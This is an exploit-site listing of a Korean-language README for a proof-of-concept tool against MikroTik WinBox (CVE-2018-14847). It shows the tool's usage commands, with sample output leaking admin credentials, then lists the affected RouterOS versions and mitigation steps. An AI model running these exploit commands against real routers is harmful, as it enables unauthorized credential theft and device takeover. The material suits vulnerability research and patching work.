Sploitus

Exploit for CVE-2018-14847

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN142 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2018-14847
# WinboxExploit

이것은 일반 ν…μŠ€νŠΈ λΉ„λ°€λ²ˆν˜Έλ₯Ό μž„μ˜λ‘œ 읽을 수 μžˆλŠ” μ€‘μš”ν•œ WinBox 취약점(CVE-2018-14847)의 κ°œλ… 증λͺ…μž…λ‹ˆλ‹€.

## λΈ”λ‘œκ·Έ κ²Œμ‹œλ¬Ό

https://n0p.me/winbox-bug-dissection/

## μš”κ΅¬ 사항

  * Python 3+



이 μŠ€ν¬λ¦½νŠΈλŠ” Python 2.x μ΄ν•˜μ—μ„œλŠ” μ‹€ν–‰λ˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.

## μ‚¬μš© 방법

이 μŠ€ν¬λ¦½νŠΈλŠ” λͺ…λ Ήμ€„μ—μ„œ κ°„λ‹¨ν•œ 인수둜 κ°„λ‹¨ν•˜κ²Œ μ‚¬μš©λ©λ‹ˆλ‹€.

#### WinBox (TCP/IP)

취약점을 μ•…μš©ν•˜μ—¬ λΉ„λ°€λ²ˆν˜Έλ₯Ό μ½μŠ΅λ‹ˆλ‹€.

root@kitploit:~
    
    
    python3 WinboxExploit.py <IP-ADDRESS> [PORT]
    

μ˜ˆμ‹œ:

root@kitploit:~
    
    
    $ python3 WinboxExploit.py 172.17.17.17
    Connected to 172.17.17.17:8291
    Exploit successful
    User: admin
    Pass: Th3P4ssWord
    

![](https://assets.kitploit.com/production/public/readmes/27320/4f9e39926a8cdddeac824e9a60f562b8d4e99944c8e281cf7a95e82147892ffd.jpg)

![](https://assets.kitploit.com/production/public/readmes/27320/a1c0d7f709cc09582c6fa84cdb37cea2d8ddc8e0602c1f37feabdfef0139fade.jpg)

#### MAC μ„œλ²„ WinBox (Layer 2)

기기에 IP μ£Όμ†Œκ°€ 없어도 νŒŒμΌμ„ μΆ”μΆœν•  수 μžˆμŠ΅λ‹ˆλ‹€.

λ‘œμ»¬μ— μ—°κ²°λœ Mikrotik μž₯치λ₯Ό μ°ΎλŠ” κ°„λ‹¨ν•œ 검색 ν™•μΈμž…λ‹ˆλ‹€.

root@kitploit:~
    
    
    python3 MACServerDiscover.py
    

μ˜ˆμ‹œ:

root@kitploit:~
    
    
    $ python3 MACServerDiscover.py
    Looking for Mikrotik devices (MAC servers)
    
        aa:bb:cc:dd:ee:ff 
    
        aa:bb:cc:dd:ee:aa
    

취약점을 μ•…μš©ν•˜μ—¬ λΉ„λ°€λ²ˆν˜Έλ₯Ό μ½μŠ΅λ‹ˆλ‹€.

root@kitploit:~
    
    
    python3 MACServerExploit.py <MAC-ADDRESS>
    

μ˜ˆμ‹œ:

root@kitploit:~
    
    
    $ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
    
    User: admin
    Pass: Th3P4ssWord
    

## μ·¨μ•½ν•œ 버전

2015-05-28λΆ€ν„° 2018-04-20κΉŒμ§€μ˜ λͺ¨λ“  RouterOS 버전은 이 μ΅μŠ€ν”Œλ‘œμž‡μ— μ·¨μ•½ν•©λ‹ˆλ‹€.

λ‹€μŒ RouterOS 버전을 μ‹€ν–‰ν•˜λŠ” Mikrotik μž₯치:

  * Longterm: 6.30.1 - 6.40.7
  * Stable: 6.29 - 6.42
  * Beta: 6.29rc1 - 6.43rc3



μžμ„Έν•œ λ‚΄μš©μ€ λ‹€μŒμ„ μ°Έμ‘°ν•˜μ‹­μ‹œμ˜€: https://blog.mikrotik.com/security/winbox-vulnerability.html

## μ™„ν™” 기법

  * λΌμš°ν„°λ₯Ό μˆ˜μ • 사항이 ν¬ν•¨λœ RouterOS λ²„μ „μœΌλ‘œ μ—…κ·Έλ ˆμ΄λ“œν•˜μ‹­μ‹œμ˜€.
  * λΌμš°ν„°μ—μ„œ WinBox μ„œλΉ„μŠ€λ₯Ό λΉ„ν™œμ„±ν™”ν•˜μ‹­μ‹œμ˜€.
  * λ‹€μŒμ„ μ‚¬μš©ν•˜μ—¬ WinBox μ„œλΉ„μŠ€μ— λŒ€ν•œ μ•‘μ„ΈμŠ€λ₯Ό νŠΉμ • IP μ£Όμ†Œλ‘œ μ œν•œν•  수 μžˆμŠ΅λ‹ˆλ‹€:



root@kitploit:~
    
    
    /ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
    

  * ν•„ν„° κ·œμΉ™(ACL)을 μ‚¬μš©ν•˜μ—¬ WinBox μ„œλΉ„μŠ€μ— λŒ€ν•œ μ™ΈλΆ€ μ•‘μ„ΈμŠ€λ₯Ό κ±°λΆ€ν•  수 μžˆμŠ΅λ‹ˆλ‹€:



root@kitploit:~
    
    
    /ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
    

  * mac-winbox μ„œλΉ„μŠ€μ— λŒ€ν•œ μ•‘μ„ΈμŠ€ μ œν•œμ€ ν—ˆμš© μΈν„°νŽ˜μ΄μŠ€λ₯Ό μ§€μ •ν•˜μ—¬ μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€:



root@kitploit:~
    
    
    /tool mac-server mac-winbox
    

## μ €μž‘κΆŒ

  * μ΄λž€ CERTCC(https://certcc.ir)의 후원을 λ°›μ•˜μŠ΅λ‹ˆλ‹€. λͺ¨λ“  ꢌ리 보유.